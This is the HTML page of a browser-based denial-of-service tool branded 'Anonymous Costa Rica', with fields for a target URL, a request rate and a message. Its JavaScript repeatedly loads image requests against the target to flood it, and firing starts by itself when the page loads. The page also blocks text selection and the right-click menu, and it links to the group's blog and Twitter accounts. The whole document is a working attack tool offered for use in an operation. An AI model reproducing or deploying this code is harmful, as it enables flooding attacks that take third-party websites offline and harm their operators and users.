- <html>
- <!-- Anonymous Costa Rica -->
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Anonymous Costa Rica</title>
- <meta name="description" content="Somos Anonymous Costa Rica..." />
- <meta property="og:image" content="http://gobblin.se/media/media_entries/4f1ccd687699ff458400004d/anoncr.png"/>
- <meta property="og:title" content="#Nombre de la OP TAG">
- <meta property="og:description" content="Anonymous Costa Rica">
- <meta property="og:type" content="website" />
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <hr />
- <div class="row">
- <div class="span16 columns">
- <center> </a>
- </center>
- </div>
- </div>
- </div>
- </div> <!-- container -->
- <style type="text/css">
- body {
- background: url("http://wallpaper.goodfon.com/image/286948-1920x1200.jpg");
- background-repeat: repeat;
- background-position: right;
- background-attachment: fixed;
- margin-top: 5%;
- margin-bottom: 5%;
- margin-left: 15%;
- margin-right: 15%;
- font-family:"Courier New", Courier, monospace;
- color: #2f323b;
- }
- fieldset {
- border-style: none;
- margin: 10px;
- }
- p {
- margin: 0;
- }
- input {
- margin: 0;
- background-color: transparent;
- border: none;
- text-align: center;
- font-family:"Courier New", Courier, monospace;
- color: #10aad1;
- }
- </style>
- <script language="JavaScript">
- <!-- Disable
- function disableselect(e){
- return false
- }
- function reEnable(){
- return true
- }
- //if IE4+
- document.onselectstart=new Function ("return false")
- document.oncontextmenu=new Function ("return false")
- //if NS6
- if (window.sidebar){
- document.onmousedown=disableselect
- document.onclick=reEnable
- }
- //-->
- </script>
- </head>
- <body onLoad="type()" >
- <fieldset>
- <div id="title" align="center"><font size="+3" color="#FF0000">[#</font><font size="+3">Nombre de la OP</font><font size="+3" color="#FF0000">] </font></div><br><br>
- <div id="hive" align="center">
- <font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
- <input name="target" id="target" size="100" value=" "><br><br>
- <font color="#FF0000">[</font>REQUESTS<font color="#FF0000">]</font><br>
- <input id="requests" size="100" value="1000"><br><br>
- <font color="#FF0000">[</font>MESSAGE<font color="#FF0000">]</font><br>
- <input id="message" size="100" value="Mensaje"><br><br>
- <font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
- REQUESTS <p id="requested">0</p>
- SUCCEDED <p id="succeeded">0</p>
- FAILED <p id="failed">0</p><br>
- <button id="fire" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255);"> STOP! </button><br><br><br>
- </div>
- <script>
- (function () {
- var fireInterval;
- var isFiring = false;
- var currentTime = new Date();
- var lastSuccess = currentTime.getTime();
- var requestedNode = document.getElementById("requested"),
- succeededNode = document.getElementById("succeeded"),
- failedNode = document.getElementById("failed"),
- targetNode = document.getElementById("target"),
- fire = document.getElementById("fire"),
- messageNode = document.getElementById("message"),
- requestsNode = document.getElementById("requests"),
- timeoutNode = document.getElementById("timeout");
- var target = targetNode.value;
- targetNode.onchange = function () {
- target = this.value;
- };
- var requestsHT = {};
- var requested = 0,
- succeeded = 0,
- failed = 0;
- var makeHttpRequest = function () {
- if ( (currentTime.getTime()-lastSuccess) > 10000) {
- return;
- } else {
- lastSuccess = currentTime.getTime();
- };
- var rID =Number(new Date());
- var img = new Image();
- img.onerror = function () { onFail(rID); };
- img.onabort = function () { onFail(rID); };
- img.onload = function () { onSuccess(rID); };
- img.setAttribute("src", target + "?id=" + rID + "&msg=" + messageNode.value);
- requestsHT[rID] = img;
- onRequest(rID);
- };
- var onRequest = function (rID) {
- requested++;
- requestedNode.innerHTML = requested;
- };
- var onComplete = function (rID) {
- delete requestsHT[rID];
- };
- var onFail = function (rID) {
- // failedCtr++;
- //failedCtrNode.innerHTML = failedCtr;
- succeeded++; //Seems like the url will always fail it it isn't an image
- succeededNode.innerHTML = succeeded;
- delete requestsHT[rID];
- };
- var onSuccess = function (rID) {
- succeeded++;
- succeededNode.innerHTML = succeeded;
- delete requestsHT[rID];
- };
- fire.onclick = function () {
- if (isFiring) {
- clearInterval(fireInterval);
- isFiring = false;
- this.innerHTML = "FIRE!";
- } else {
- isFiring = true;
- this.innerHTML = "STOP!";
- fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
- }
- };
- function start() {
- if (isFiring) {
- clearInterval(fireInterval);
- isFiring = false;
- this.innerHTML = "FIRE!";
- } else {
- isFiring = true;
- this.innerHTML = "STOP";
- fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
- }
- };
- document.getElementById("target").value = " ";
- start();
- })();
- </script>
- </fieldset>
- <center>
- <hr />
- <div class="row">
- <div class="span16 columns">
- <center><font color="Blue" face="System"<h3>Anon</b></h3></font><font color="White" face="System"<h3>ymo</b></h3></font><font color="RED" face="System"<h3>us Costa </b></h3></font><font color="White" face="System"<h3>Ri</b></h3></font><font color="Blue" face="System"<h3>ca</h3></font> </a>
- </center>
- <footer id="homefooter" data-hires="true">
- <div id="links">
- <p class="left">Blog <a href="http://anoncostarica.wordpress.com/">anoncostarica</a>| Twitter <a href="https://twitter.com/anonymousCRI">anonymousCRI</a> - <a href="https://twitter.com/AnonCostaRica">AnonCostaRica</a>.</p>
- </ul>
- </div><!--/links-->
- </div>
- </div>
- </div>
- </div> <!-- container -->
- </div>
- </BODY>
- </HTML>
- <!-- Anonymous Costa Rica -->